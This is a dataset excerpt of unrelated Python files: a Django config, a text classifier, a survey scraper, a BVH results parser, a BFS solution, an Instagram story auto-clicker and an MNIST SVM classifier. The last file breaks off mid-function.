text
stringlengths 8
6.05M
|
|---|
from django.apps import AppConfig
class OrdersConfig(AppConfig):
    """Django application configuration for the orders app."""

    # Dotted module path Django uses to locate this application.
    name = 'trymake.apps.orders'
|
# Printable ASCII characters from '!' through '~', in code-point order.
A='!'+'"#$%&'+"'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
# Read two characters from stdin and print the inclusive run between them.
start = A.find(input())
end = A.find(input())
print(A[start:end + 1])
|
# import libraries
import sys
# Storage
import pandas as pd
from sqlalchemy import create_engine
# NLP
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import word_tokenize
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
# sklearn
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.multioutput import MultiOutputClassifier
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.metrics import classification_report, f1_score
from sklearn.externals import joblib
def load_data(database_filepath):
    """
    Load the messages table from a SQLite database.

    Target columns that do not contain exactly two distinct values are
    dropped, because single-valued targets may crash the classifier.

    Parameters:
    -----------
    database_filepath: path to SQLite database

    Return value:
    -------------
    X: Series with the message text (features)
    Y: DataFrame with binary targets
    category_names: Names of the targets
    """
    def drop_single_value_columns(data):
        """
        Drop any column which doesn't contain two different values.

        The original code computed the column mask twice, the first time as
        a dead no-op statement; compute it once and return a new frame
        instead of mutating a slice of the caller's DataFrame in place.
        """
        return data.drop(columns=data.columns[data.nunique(axis=0) != 2])

    engine = create_engine('sqlite:///' + database_filepath)
    connection = engine.connect()
    try:
        df = pd.read_sql_table("messages", con=connection)
    finally:
        # Release the DB connection even if the read fails.
        connection.close()
    X = df.iloc[:, 1]
    Y = drop_single_value_columns(df.iloc[:, 4:])
    category_names = list(Y.columns)
    return X, Y, category_names
# Module-level on purpose: defining stop_words inside tokenize() forced
# n_jobs=1 in GridSearchCV, otherwise workers failed with
# _pickle.PicklingError: Could not pickle the task to send it to the workers.
stop_words = stopwords.words('english')
def tokenize(text):
    """
    Normalize, tokenize and lemmatize a message string.

    Parameters:
    -----------
    text: raw message string

    Return value:
    -------------
    List of lemmatized, lower-cased tokens with stop words removed
    """
    # Lower-case and strip everything that is not alphanumeric.
    cleaned = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
    words = word_tokenize(cleaned)
    # Lemmatize, skipping stop words (module-level stop_words keeps this
    # function picklable for parallel GridSearchCV workers).
    lemmatizer = WordNetLemmatizer()
    return [lemmatizer.lemmatize(word) for word in words if word not in stop_words]
def build_model():
    """
    Build a text-classification pipeline (bag-of-words -> tf-idf -> SVC)
    wrapped in a grid search over the SVC kernel.

    Return value:
    -------------
    GridSearchCV instance ready for fitting
    """
    steps = [
        ('vect', CountVectorizer(tokenizer=tokenize)),
        ('tfidf', TfidfTransformer()),
        ('mcfl', MultiOutputClassifier(estimator=SVC())),
    ]
    search_space = {'mcfl__estimator__kernel': ['linear', 'rbf']}
    return GridSearchCV(Pipeline(steps), param_grid=search_space,
                        verbose=10, cv=2, n_jobs=-1, scoring='f1_micro')
def evaluate_model(model, X_test, Y_test, category_names):
    """
    Evaluate the model on held-out data and print a classification report
    (precision, recall and f1-score for each category).

    Parameters:
    -----------
    model: the fitted model to be evaluated
    X_test: input for testing
    Y_test: true values
    category_names: list of names of categories
    """
    predictions = model.predict(X_test)
    report = classification_report(Y_test, predictions, target_names=category_names)
    print(report)
def save_model(model, model_filepath):
    """
    Save best model to disk
    Parameters:
    -----------
    model: GridSearchCV
    model_filepath: Path for storage
    """
    # NOTE(review): joblib is imported from sklearn.externals at the top of
    # this file; that location was removed in scikit-learn 0.23 — confirm the
    # pinned sklearn version or migrate to the standalone joblib package.
    # Only the best estimator (not the whole grid search) is persisted.
    joblib.dump(model.best_estimator_, model_filepath, compress = 1)
def main():
    """Command-line entry point: load data, train, evaluate and save the model."""
    # Guard clause: exactly two positional arguments are required.
    if len(sys.argv) != 3:
        print('Please provide the filepath of the disaster messages database '\
              'as the first argument and the filepath of the pickle file to '\
              'save the model to as the second argument. \n\nExample: python '\
              'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
        return
    database_filepath, model_filepath = sys.argv[1:]
    print('Loading data...\n DATABASE: {}'.format(database_filepath))
    X, Y, category_names = load_data(database_filepath)
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
    print('Building model...')
    model = build_model()
    print('Training model...')
    model.fit(X_train, Y_train)
    print('Evaluating model...')
    evaluate_model(model, X_test, Y_test, category_names)
    print('Saving model...\n MODEL: {}'.format(model_filepath))
    save_model(model, model_filepath)
    print('Trained model saved!')
|
def fib(n):
    """Print the first n Fibonacci numbers.

    Matches the original output format exactly: n == 1 and n == 2 print a
    list-style literal, larger n prints one number per line.
    """
    if n == 1:
        print("[0]")
    elif n == 2:
        print("[0,1]")
    else:
        print("0")
        print("1")
        previous, current = 0, 1
        for _ in range(n - 2):
            previous, current = current, previous + current
            print(current)
# Demo driver: read the desired sequence length from stdin and print it.
x=int(input("enter the number of fib to generate"))
fib(x)
|
#!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 28 12:49:03 2020
@author: ejreidelbach
:DESCRIPTION: This script scrapes data from the results of the Eagle
Dynamics' 2020 F-18 roadmap survey for further analysis.
Actual survey link: https://docs.google.com/forms/d/e/1FAIpQLSfKuQ53phRBCLQT03QFLX18UcA2UiibvZO6uvGeosGRPhpYrg/viewanalytics
:REQUIRES:
- Refer to the Package Import section of the script
:NOTES:
NOTE 1: For the Selenium driver to function properly on Ubuntu, I had to
download the most up-to-date geckodriver found at:
https://github.com/mozilla/geckodriver/releases
Once that is complete, extract the driver and place it in the
/usr/local/bin folder
NOTE 2: An effective selenium guide can be found here:
https://automatetheboringstuff.com/chapter11/
The relevant contents begin roughly 3/4 down the page.
:TODO: N/A
"""
#==============================================================================
# Package Import
#==============================================================================
import os
import pandas as pd
import pathlib
import time
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
#==============================================================================
# Functions
#==============================================================================
def scrape_f18_poll():
    '''
    Purpose: Scrapes the questions and results for every poll question in the
        Eagle Dynamics F-18 Road Map Survey.
    Inputs
    ------
    NONE
    Outputs
    -------
    df_poll : Pandas DataFrame
        Contains the latest survey results in a tabular format
    '''
    # set the url to the F18 survey site
    url = 'https://docs.google.com/forms/d/e/1FAIpQLSfKuQ53phRBCLQT03QFLX18UcA2UiibvZO6uvGeosGRPhpYrg/viewanalytics'
    # initialize a headless Chrome driver (hard-coded local driver path)
    options = Options()
    options.headless = True
    driver = webdriver.Chrome(executable_path=r'C:\Users\reideej1\Projects\chromedriver.exe',
                              options=options)
    # Scrape the page
    driver.get(url)
    # Parse the rendered page with BeautifulSoup, then release the browser
    html = driver.page_source
    soup = BeautifulSoup(html, "html.parser")
    driver.quit()
    # Extract the question in the poll (jsname/class values are Google Forms
    # internals and may change without notice)
    html_poll = soup.find('div', {'jsname':'cAPHHf'})
    html_questions = html_poll.find_all('span',{'class':'freebirdAnalyticsViewQuestionTitle'})
    list_questions = [x.text for x in html_questions]
    # Extract the results for each poll question: each chart carries a hidden
    # table; read it into a dict of answer -> count
    html_results = html_poll.find_all('div',{'aria-label':'A tabular representation of the data in the chart.'})
    list_results = [pd.read_html(str(x.find('table')))[0].set_index(
        'Unnamed: 0').T.to_dict('records')[0] for x in html_results]
    # merge all results into a dataframe, one column per question
    df_poll = pd.DataFrame()
    col_count = 0
    for question, result in zip(list_questions, list_results):
        # initialize dataframe from the first question
        if col_count == 0:
            df_poll = pd.DataFrame.from_dict(result, orient='index')
            df_poll.columns = [question]
        # insert column into master dataframe
        # NOTE(review): this assumes every question has the same answer rows
        # in the same order as the first — confirm against the live form
        else:
            df_poll.insert(col_count,question, result.values(), True)
        col_count = col_count + 1
    # reset the df index and save the votes column
    df_poll = df_poll.reset_index().rename(columns={'index':'vote'})
    # create a timestamp for naming purposes when writing to disk
    timestamp = time.strftime('%d_%m_%Y_%H_%M_%S')
    # set the output directory
    path_output = pathlib.Path(r'C:\Users\reideej1\Projects\dcs\data')
    # write the file to disk
    # NOTE(review): '\p' in this f-string is currently a literal backslash
    # but is an invalid escape sequence (DeprecationWarning); consider a
    # pathlib join — confirm before changing
    df_poll.to_csv(f'{path_output}\poll_results_{timestamp}.csv', index = False)
    return df_poll
|
import os.path
import math
from os import path
# Catalog of scene names; `everything.names` below holds indexes into this list.
allNames =[
    "lizard",
    "shiftHappens",
    "erato",
    "cubes",
    "sponza",
    "daviaRock",
    "rungholt",
    "breakfast",
    "sanMiguel",
    "amazonLumberyardInterior",
    "amazonLumberyardExterior",
    "amazonLumberyardCombinedExterior",
    "gallery",
]
def fixNone(value):
    """Map None to 0 for table output; pass every other value through.

    Uses `is None` (identity) rather than the original `== None` equality
    test, per standard Python practice.
    """
    return 0 if value is None else value
class sceneContainer:
    """Per-scene results: scene identity plus one entry list per subdivision."""
    def __init__(self):
        # Index of this scene within the module-level allNames list.
        self.sceneNameId = 0
        self.sceneName = ""
        # One list of storageType entries per subdivision level.
        self.subdivisions = []
class storageType:
    """Holds all measured values for one (subdivision, branch, leaf) config."""
    def __init__(self, subdivision, branch, leaf, listOfVariableCounts):
        # listOfVariableCounts: sizes of the three value arrays, in order
        # [plain variables, normalized variables, cacheline-scaled variables].
        self.branch = branch
        self.leaf = leaf
        self.subdivision = subdivision
        # Values for plain variables (e.g. node intersection count).
        self.variableValues = [None for _ in range(listOfVariableCounts[0])]
        # Values for normalized variables (e.g. waste factor).
        self.normalizedVariableValues = [None for _ in range(listOfVariableCounts[1])]
        # Values multiplied by the number of cachelines a node occupies.
        self.variableNodeCachelinesValues = [None for _ in range(listOfVariableCounts[2])]
        # Timings from the perf files; None until (if ever) parsed.
        self.totalTime = None
        self.nodeTime = None
        self.leafTime = None
class everything:
    """Reads BVH intersection/performance result files for a set of scenes
    and writes one summary table per scene (one row per branch factor /
    leaf size / subdivision combination)."""
    def __init__(self, wide):
        """wide selects which per-workgroup perf folder variant is read."""
        #the folder all the scene folders are in: (leave empty if no folder)
        #self.folder = "ResultsStorage/Data/IntersectionResults/"
        #self.outputFolder = "Summary/"
        #self.folder = "ResultsStorage/Data/AllIntersections/"
        self.folder = "ResultsStorage/Data/AllIntersectionsNoSplit/"
        self.outputFolder = "Summary/tmp/"
        #indexes into allNames selecting the scenes to process
        self.names = [4,8,9,10,12]
        #self.names = [4]
        #prefix to the folder names like this "_4To16"
        #self.prefix = "_4To16"
        self.prefix = ""
        #prefix to the output txt (so its sceneNamePrefix.txt)
        self.outputPrefix = ""
        self.workGroupSize = 16
        #True = wide traversal variant, False = normal variant
        self.wide = wide
        if self.wide:
            self.intermediateFolderName = "WorkGroupSize_" + str(self.workGroupSize) + "_Wide/"
        else:
            self.intermediateFolderName = "WorkGroupSize_" + str(self.workGroupSize) + "_Normal/"
        # -1 for all, id otherwise (starting with 0)
        self.singeIdOverride = -1
        #minimum/maximum branching factor and leaf size of the sweep
        self.minBranchingFactor = 2
        self.maxBranchingFactor = 16
        self.minLeafSize = 1
        self.maxLeafSize = 16
        self.branchStep = 1
        self.leafStep = 1
        #inclusive range of subdivisions we test
        self.subdivisionRange = [0, 0]
        self.subdivisionCount = self.subdivisionRange[1] - self.subdivisionRange[0] + 1
        # 0 = avx, 1 = sse (index into gangName)
        self.gangType = 1
        self.gangName = ["Avx", "Sse"]
        #temporary cost function factors
        self.nodeCostFactor = 1
        self.leafCostFactor = 1
        #cacheline size in bytes, used by gatherNodeCachelineVariable
        self.cachelineSize = 128
        #keys searched for in the info files (matched by substring)
        self.variableNames = [
            "primary intersections node:",
            "primary intersections leaf:",
            "primary aabb intersections:",
            "primary aabb success ration:",
            "primary primitive intersections:",
            "primary primitive success ratio:",
            "secondary intersections node:",
            "secondary intersections leaf:",
            "secondary aabb intersections:",
            "secondary aabb success ration:",
            "secondary primitive intersections:",
            "secondary primitive success ratio:",
            "sah of node:",
            "sah of leaf:",
            "end point overlap of node:",
            "end point overlap of leaf:",
            "volume of leafs:",
            "surface area of leafs:",
            "average child fullness:",
            "average leaf fullness:",
            "average bvh node fullness:",
            "average bvh leaf fullness:",
            "number of nodes:",
            "number of leafnodes:",
            "average leaf depth:",
            "tree depth:",
        ]
        #column headers written for the variables above (same order)
        self.variableOutputNames = [
            "primaryNodeIntersections",
            "primaryLeafIntersections",
            "primaryAabb",
            "primaryAabbSuccessRatio",
            "primaryPrimitive",
            "primaryPrimitiveSuccessRatio",
            "secondaryNodeIntersections",
            "secondaryLeafIntersections",
            "secondaryAabb",
            "secondaryAabbSuccessRatio",
            "secondaryPrimitive",
            "secondaryPrimitiveSuccessRatio",
            "nodeSah",
            "leafSah",
            "nodeEpo",
            "leafEpo",
            "leafVolume",
            "leafSurfaceArea",
            "traversalNodeFullness",
            "traversalLeafFullness",
            "BVHNodeFullness",
            "BVHLeafFullness",
            "nodeCount",
            "leafCount",
            "averageLeafDepth",
            "treeDepth",
        ]
        #keys for normalized variables like the waste factor
        self.normalizedVariableNames = [
            "primary waste factor:",
            "secondary waste factor:"
        ]
        self.normalizedVariableOutputNames = [
            "primaryWasteFactor",
            "secondaryWasteFactor"
        ]
        #keys for variables that are multiplied by the cachelines they use
        self.variableNodeCachelinesNames = [
            "primary intersections node:",
            "secondary intersections node:"
        ]
        self.variableNodeCachelinesOutputNames = [
            "primaryNodeCachelines",
            "secondaryNodeCachelines"
        ]
        #fullness would be some special thing because its divided by leafsize
        # -> could do variables divided by leafsize and ones divided by branchFactor
        # -> and ones multiplied by it?
        #initialize storage: one sceneContainer slot per selected scene
        self.storage = [None for _ in range(len(self.names))]
        #folder with the performance files (currently the laptop perf runs)
        self.perfFolder = "ResultsStorage/Data/PerfResult1/"
        self.listVariableCount = [len(self.variableNames), len(self.normalizedVariableNames), len(self.variableNodeCachelinesNames)]
        if not os.path.exists(self.outputFolder):
            os.makedirs(self.outputFolder)
    def run(self):
        """Parse all result files per scene, then write one table per scene."""
        # now loop over all scenes to do the single scene file (and collect min max)
        # then loop over all and get averages
        # Build the CSV-style header once.
        firstLine = "branchFactor, leafSize, subdivision"
        for name in self.variableOutputNames:
            firstLine += ", " + name
        for name in self.normalizedVariableOutputNames:
            firstLine += ", " + name
        for name in self.variableNodeCachelinesOutputNames:
            firstLine += ", " + name
        firstLine += ", totalTime, nodeTime, leafTime, perAabbCost, perTriCost, sahNodeFactor"
        # Initialize one container per selected scene.
        for loopId, nameId in enumerate(self.names):
            self.storage[loopId] = sceneContainer()
            self.storage[loopId].sceneName = allNames[nameId]
            self.storage[loopId].sceneNameId = nameId
            self.storage[loopId].subdivisions = [[] for _ in range(self.subdivisionCount)]
        #averageStorage = [[] for _ in range(self.subdivisionCount)]
        # Sweep every scene / subdivision / branch factor / leaf size.
        for loopId, nameId in enumerate(self.names):
            name = allNames[nameId]
            for s in range(self.subdivisionRange[1] - self.subdivisionRange[0] + 1):
                for b in range(0, self.maxBranchingFactor -(self.minBranchingFactor - 1), self.branchStep):
                    for l in range(0, self.maxLeafSize - (self.minLeafSize - 1), self.leafStep):
                        branch = b + self.minBranchingFactor
                        leaf = l + self.minLeafSize
                        storagePerSubdivision = storageType(s, branch, leaf, self.listVariableCount)
                        # Folder layout differs when subdivisions are in play.
                        if(self.subdivisionRange[1] == 0):
                            fileName = self.folder + name + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_Info.txt"
                            fileName2 = self.folder + name + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_BVHInfo.txt"
                            fileName3 = self.perfFolder + name + self.gangName[self.gangType] +"Perf" + self.prefix + "/" + self.intermediateFolderName + name + "_b" + str(branch) + "_l" + str(leaf) + "_mb" + str(branch) + "_ml" + str(leaf) + "_Perf.txt"
                        else:
                            fileName = self.folder + name + "Sub" + str(s) + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_Info.txt"
                            fileName2 = self.folder + name + "Sub" + str(s) + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_BVHInfo.txt"
                            fileName3 = self.perfFolder + name + self.gangName[self.gangType] +"Perf" + "Sub" + str(s) + self.prefix + "/" + name + "_b" + str(branch) + "_l" + str(leaf) + "_mb" + str(branch) + "_ml" + str(leaf) + "_Perf.txt"
                        anyFileExists = False
                        # NOTE(review): the three file handles opened below are
                        # never explicitly closed; `with` blocks would be safer.
                        if (path.exists(fileName)):
                            #open file and read important values
                            f = open(fileName, "r")
                            if f.mode == 'r':
                                self.gatherAll(storagePerSubdivision, f)
                                anyFileExists = True
                        if (path.exists(fileName2)):
                            #open file and read important values
                            f = open(fileName2, "r")
                            if f.mode == 'r':
                                self.gatherAll(storagePerSubdivision, f)
                                anyFileExists = True
                        if (path.exists(fileName3)):
                            #open file and read important values
                            f = open(fileName3, "r")
                            if f.mode == 'r':
                                self.gatherPerf(storagePerSubdivision, f)
                                anyFileExists = True
                        if anyFileExists:
                            self.storage[loopId].subdivisions[s].append(storagePerSubdivision)
        #remove all empty fields (due to scenes with different max subdivision);
        #iterate in reverse so pop() doesn't shift pending indexes
        for scenes in self.storage:
            for sub in reversed(range(self.subdivisionCount)):
                if (len(scenes.subdivisions[sub]) == 0):
                    scenes.subdivisions.pop(sub)
        #loop over storage and do output
        for scenes in self.storage:
            #create file if i want one file for all subs
            name = scenes.sceneName
            if self.wide:
                wideString = "_Wide"
            else:
                wideString = "_Normal"
            #output file:
            if(self.subdivisionRange[1] == 0):
                fResult = open(self.outputFolder + name + self.prefix + "Table" + self.outputPrefix + wideString +".txt", "w+")
            else:
                fResult = open(self.outputFolder + name + "Sub" + self.prefix + "Table" + self.outputPrefix + wideString + ".txt", "w+")
            fResult.write(firstLine + "\n")
            for subId, sub in enumerate(scenes.subdivisions):
                for configStorage in sub:
                    #empty line for table with space if branching factor changes
                    #write results
                    line = self.makeLine([configStorage.branch, configStorage.leaf, configStorage.subdivision])
                    line += ", " + self.makeLine(configStorage.variableValues)
                    line += ", " + self.makeLine(configStorage.normalizedVariableValues)
                    line += ", " + self.makeLine(configStorage.variableNodeCachelinesValues)
                    sahNodeFactor , nodeCost, leafCost = None, None, None
                    # Derived per-intersection costs; only possible when both
                    # perf timings and intersection counts were parsed.
                    if configStorage.totalTime != None and configStorage.variableValues[0] != None:
                        #i calculate the cost for one node intersection and for one leaf intersection
                        nodeCost = configStorage.nodeTime / (configStorage.variableValues[0] + configStorage.variableValues[2])
                        leafCost = configStorage.leafTime / (configStorage.variableValues[1] + configStorage.variableValues[3])
                        if(leafCost != 0):
                            sahNodeFactor = nodeCost / leafCost
                    line += ", " + self.makeLine([fixNone(configStorage.totalTime), fixNone(configStorage.nodeTime), fixNone(configStorage.leafTime), fixNone(nodeCost), fixNone(leafCost), fixNone(sahNodeFactor)])
                    fResult.write(line + "\n")
            fResult.close()
        #one for each subdivision and one for each branch / leafsize combination
        #the more im thinking about it, average isnt that usefull
        #averageStorage = [[] for _ in range(self.subdivisionCount)]
        #average
        #sceneCount = len(self.names)
        #if sceneCount > 1:
        #fResult = open("AverageTableWithSpace.txt")
        #fResult2 = open("AverageTable.txt")
    def makeLine(self, array):
        """Join the array's elements into a ', '-separated string."""
        line = "" + str(array[0])
        for element in array[1:]:
            line += ", " + str(element)
        return line
    def gatherAll(self, subStorage, file):
        """Scan an info file once per variable key and store matched values."""
        for vId, keyToMatch in enumerate(self.variableNames):
            anyHit = False
            file.seek(0)
            for line in file:
                hit, value = self.gatherVariable(keyToMatch, line)
                if hit:
                    if anyHit:
                        print("ERROR: variable was found twice")
                    anyHit = True
                    subStorage.variableValues[vId] = value
        for vId, keyToMatch in enumerate(self.normalizedVariableNames):
            anyHit = False
            file.seek(0)
            for line in file:
                hit, value = self.gatherVariable(keyToMatch, line)
                if hit:
                    if anyHit:
                        print("ERROR: normalized variable was found twice")
                    anyHit = True
                    subStorage.normalizedVariableValues[vId] = value
        for vId, keyToMatch in enumerate(self.variableNodeCachelinesNames):
            anyHit = False
            file.seek(0)
            for line in file:
                hit, value = self.gatherNodeCachelineVariable(keyToMatch, line, subStorage.branch)
                if hit:
                    if anyHit:
                        print("ERROR: cacheline variable was found twice")
                    anyHit = True
                    subStorage.variableNodeCachelinesValues[vId] = value
    def gatherPerf(self, subStorage, file):
        """Read total/node/leaf timings from a perf file into subStorage."""
        anyHit = False
        file.seek(0)
        for line in file:
            hit, value = self.gatherVariable("Raytracer total time:", line)
            if hit:
                if anyHit:
                    print("ERROR: total time was found twice")
                anyHit = True
                subStorage.totalTime = value
        anyHit = False
        file.seek(0)
        for line in file:
            hit, value = self.gatherVariable("Time all rays(sum) - triangle(sum):", line)
            if hit:
                if anyHit:
                    print("ERROR: node time was found twice")
                anyHit = True
                subStorage.nodeTime = value
        anyHit = False
        file.seek(0)
        for line in file:
            hit, value = self.gatherVariable("Time for triangle intersections (SUM):", line)
            if hit:
                if anyHit:
                    print("ERROR: leaf time was found twice")
                anyHit = True
                subStorage.leafTime = value
    def gatherVariable(self, keyToMatch, string):
        """Return (True, first float token) if keyToMatch occurs in string,
        otherwise (False, 0)."""
        if(string.find(keyToMatch) != -1):
            for t in string.split():
                try:
                    value = float(t)
                    return True, value
                    #only take first value (second one might be average)
                    # NOTE: this break is unreachable — the return above exits.
                    break
                except ValueError:
                    pass
        return False, 0
    def gatherNodeCachelineVariable(self, keyToMatch, string, branch):
        """Like gatherVariable, but scales the value by the number of
        cachelines one node occupies (branch * 32 bytes, rounded up to
        whole cachelines of self.cachelineSize bytes)."""
        if(string.find(keyToMatch) != -1):
            for t in string.split():
                try:
                    byteNeeded = branch * 32
                    factor = byteNeeded / self.cachelineSize
                    value = float(t) * math.ceil(factor)
                    return True, value
                    #only take first value (second one might be average)
                    # NOTE: this break is unreachable — the return above exits.
                    break
                except ValueError:
                    pass
        return False, 0
# Generate summary tables for both traversal variants (wide and normal).
e = everything(wide = True)
e.run()
e = everything(wide = False)
e.run()
|
'''
summary
가장 멀리 떨어진 노드 개수 출력
params
vn=6
: 6개의 v
es=[[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]
: 각 es
output
3 : 1번 노드에서 가장 멀리 떨어진 v는 3개
strategy
한 v에서 여러 v로
무방향, 가중치X
bfs로 depth 기록하면서 가장 멀리 떨어진 노드 보면 될듯!
'''
from collections import deque
def solution(vn, es):
    """Count the vertices at maximum BFS depth from vertex 1.

    vn: number of vertices, labelled 1..vn.
    es: undirected, unweighted edge list as [u, v] pairs.
    Returns the number of vertices that are farthest from vertex 1.
    """
    adjacency = [[] for _ in range(vn + 1)]
    for a, b in es:
        adjacency[a].append(b)
        adjacency[b].append(a)
    # depth -1 marks "not visited yet"; vertex 1 is the BFS source.
    depths = [-1] * (vn + 1)
    depths[1] = 0
    queue = deque([1])
    while queue:
        current = queue.popleft()
        for neighbour in adjacency[current]:
            if depths[neighbour] == -1:
                depths[neighbour] = depths[current] + 1
                queue.append(neighbour)
    return depths.count(max(depths))
print(solution(6, [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]))
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from bs4 import BeautifulSoup as b
import time
import sys
# Instagram story auto-clicker: logs in, opens the first story and presses
# "next" repeatedly.  Selectors are brittle Instagram internals.
# BUGFIX: the original had `username=` / `password=` with no right-hand side,
# which is a SyntaxError; placeholders are provided instead.
username = 'your_username'  # TODO: fill in a real account name
password = 'your_password'  # TODO: fill in the account password
chrome_browser = webdriver.Chrome('./chromedriver')
chrome_browser.maximize_window()
print('loggin in')
chrome_browser.get('https://www.instagram.com/accounts/login/?source=auth_switcher')
# Wait for the username field, then fill in both credential fields.
uid = WebDriverWait(chrome_browser, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#react-root > section > main > div > article > div > div:nth-child(1) > div > form > div:nth-child(2) > div > label > input')))
uid.click()
uid.send_keys(username)
pswd = chrome_browser.find_element_by_css_selector('#react-root > section > main > div > article > div > div:nth-child(1) > div > form > div:nth-child(3) > div > label > input')
pswd.click()
pswd.send_keys(password)
btn = chrome_browser.find_element_by_css_selector('#react-root > section > main > div > article > div > div:nth-child(1) > div > form > div:nth-child(4)')
btn.click()
time.sleep(5)
print('getting homepage')
chrome_browser.get('https://www.instagram.com/')
try:
    # Dismiss the optional "Turn on notifications" dialog if it appears.
    not_now = WebDriverWait(chrome_browser, 10).until(EC.presence_of_element_located((By.XPATH, '/html/body/div[4]/div/div/div/div[3]/button[2]')))
    not_now.click()
except Exception:
    # Dialog not shown — nothing to dismiss.  (Narrowed from a bare except
    # so Ctrl-C still interrupts the script.)
    pass
print('getting stories')
first_story = WebDriverWait(chrome_browser, 10).until(EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/section/main/section/div/div[1]/div/div/div/div/ul/li[4]/div/button')))
first_story.click()
time.sleep(5)
print('clicking next')
clickC = 0   # successful "next" clicks
errorC = 0   # failed attempts
errorL = []  # exception types from the failed attempts
for i in range(300):
    try:
        next_button = WebDriverWait(chrome_browser, 10).until(EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/section/div/div/section/div[2]/button[2]')))
        next_button.click()
        clickC += 1
    except Exception:
        errorC += 1
        errorL.append(sys.exc_info()[0])
print(f'clicked next on {clickC} stories')
print(f'{errorC} errors occurred')
|
import pickle
import sklearn
from sklearn import svm # this is an example of using SVM
from mnist import load_mnist
import matplotlib.pyplot as plt
import numpy as np
#fairtraintest return Training and Testing Arrays of size trainsize and testsize (x28x28)
#it selects example so as to have an equal distribution of each label - You can also put 0 for testsize or trainsize, and then it just returns an equal distribution of labels
def fairtraintest(images, labels, trainsize, testsize):
    """Split (images, labels) into label-balanced train and test sets.

    Walks a shuffled index order, filling the test set first, then the
    training set, until each digit 0-9 has size/10 examples per set or the
    data runs out.  Returns (TrainingSet, TrainLabels, TestingSet,
    TestingLabels), or False when there are too few images.
    Python 2 code (print statement); images are assumed flattened to 784
    elements — TODO confirm against the caller's preprocess().
    """
    if len(images) < trainsize + testsize:
        print "error: cannot divide images without repeats"
        return False
    else:
        indexes = np.arange(len(images))
        np.random.shuffle(indexes) #randomize data selected
        done = False
        # Per-digit completion flags and counters for the test split.
        doneTest = np.zeros(10, dtype=bool)
        Testcounts = np.zeros(10)
        Testtotalcount = 0
        TestingSet = np.zeros((testsize, 784))
        TestingLabels = np.zeros(testsize)
        if(testsize == 0):
            # No test split requested: mark every digit as already done.
            doneTest = np.ones(10, dtype=bool)
        # Per-digit completion flags and counters for the training split.
        doneTraining = np.zeros(10, dtype=bool)
        Traincounts = np.zeros(10)
        Traintotalcount = 0
        TrainingSet = np.zeros((trainsize, 784))
        TrainLabels = np.zeros(trainsize)
        if(trainsize == 0):
            doneTraining = np.ones(10, dtype=bool)
        count = 0
        while done == False:
            label = labels[indexes[count]]
            # Test split has priority; each digit is capped at size/10.
            if doneTest[label] == False and Testtotalcount < testsize and testsize > 0:
                TestingSet[Testtotalcount] = images[indexes[count]]
                TestingLabels[Testtotalcount] = label
                Testtotalcount += 1
                Testcounts[label] += 1
                if Testcounts[label] >= (testsize/10):
                    doneTest[label] = True
            elif doneTraining[label] == False and Traintotalcount < trainsize and trainsize > 0:
                TrainingSet[Traintotalcount] = images[indexes[count]]
                TrainLabels[Traintotalcount] = label
                Traintotalcount += 1
                Traincounts[label] += 1
                if Traincounts[label] >= (trainsize/10):
                    doneTraining[label] = True
            # Stop when both splits are complete or the data is exhausted.
            if np.all(doneTest) and np.all(doneTraining):
                done = True
            count += 1
            if count == len(images):
                done = True
        return TrainingSet, TrainLabels, TestingSet, TestingLabels
def preprocess(images):
    """Flatten each image to a 1-D vector; no other normalisation is done."""
    flattened = []
    for image in images:
        flattened.append(image.flatten())
    return flattened
#this function is suggested to help build your classifier.
#You might want to do something with the images before
#handing them to the classifier. Right now it does nothing.
##we need to normalize the images
#No need for preprocess on SVM as we use gradient
def custom_build_classifier(images, labels, c, deg, poly):
    """Fit an SVC on (images, labels).

    poly == 1 selects the polynomial kernel; any other value keeps the
    library default kernel.  c and deg are passed straight to svm.SVC.
    Returns the fitted classifier.
    """
    if poly == 1:
        model = svm.SVC(C=c, degree=deg, kernel='poly')
    else:
        model = svm.SVC(C=c, degree=deg)
    model.fit(images, labels)
    return model
def build_classifier(images, labels):
    """Fit the tuned classifier: polynomial-kernel SVC with C=50, degree=2
    (parameters chosen from the 5-fold cross-validation runs below)."""
    tuned = svm.SVC(C=50, degree=2, kernel='poly')
    # SVC.fit returns the estimator itself, so this returns the fitted model.
    return tuned.fit(images, labels)
##the functions below are required
def save_classifier(classifier, training_set, training_labels):
    """Persist the classifier to 'classifier_1.p' with pickle.

    training_set and training_labels are accepted for interface
    compatibility but are not written (the original never wrote them
    either, despite its comment).  Fixes: the file is now opened in
    binary mode — required for pickle data — and closed deterministically;
    the redundant function-local `import pickle` (already imported at the
    top of the file) is gone.
    """
    with open('classifier_1.p', 'wb') as fh:
        pickle.dump(classifier, fh)
def classify(images, classifier):
    """Run a fitted classifier on a set of images; returns predicted labels."""
    return classifier.predict(images)
def error_measure(predicted, actual):
    """Fraction of predictions that differ from the true labels."""
    mismatches = np.count_nonzero(abs(predicted - actual))
    return mismatches / float(len(predicted))
def fivefoldsize(images, labels, C, degree, poly):
    """5-fold cross-validation; returns the mean error across folds.

    C, degree and poly are forwarded to custom_build_classifier.
    Python 2 code (print statements, xrange).
    """
